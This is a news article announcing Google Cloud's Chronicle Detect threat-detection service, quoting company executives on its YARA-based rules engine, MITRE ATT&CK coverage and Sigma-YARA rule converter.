Chronicle Detect, a new threat-detection solution built on the infrastructure of Google Cloud, is all slated to become generally available in the fourth quarter of 2020. This tool will help organizations move swiftly from legacy security tools to a modern system that can identify threats at scale within a short time.
Available at no additional cost to Chronicle customers, Chronicle Detect is announced at a time when enterprise IT environments are facing increasingly complex challenges with sophisticated hacking tactics and growing data volumes that cannot be handled by the existing analytics and detection tools.
“In legacy security systems, it’s difficult to run many rules in parallel and at scale, so even if detection is possible, it may be too late,” Rick Caccia, Google Cloud’s head of marketing for cloud security, and Sunil Potti, general manager and vice president of engineering for cloud security, wrote in a blog post. “Most analytics tools use a data-query language, making it difficult to write detection rules described in scenarios such as the MITRE ATT&CK framework. Detections often require threat intelligence on attacker activity that many vendors simply don’t have. As a result, security tools are unable to detect many modern threats.”
Previously, Chronicle was a separate cybersecurity startup in the portfolio of Alphabet, the parent company of Google. Now, Chronicle Detect allows users to migrate existing rules or build their own rules from their legacy tools.
“The rules engine incorporates one of the most flexible and widely-used detection languages in the world, YARA, which makes it easy to build detections for tactics and techniques found in the commonly used MITRE ATT&CK security framework,” Caccia and Potti said. “Many organizations are also integrating Sigma-based rules that work across systems or converting their legacy rules to Sigma for portability. Chronicle Detect includes a Sigma-YARA converter so that customers can port their rules to and from our platform.”
“Using our Google-scale platform, security teams can send their security telemetry to Chronicle at a fixed cost, so that diverse, high-value security data can be taken into account for detections,” Caccia and Potti wrote. “We automatically make that security data useful by mapping it to a common data model across machines, users and threat indicators, so that you can quickly apply powerful detection rules to a unified set of data.”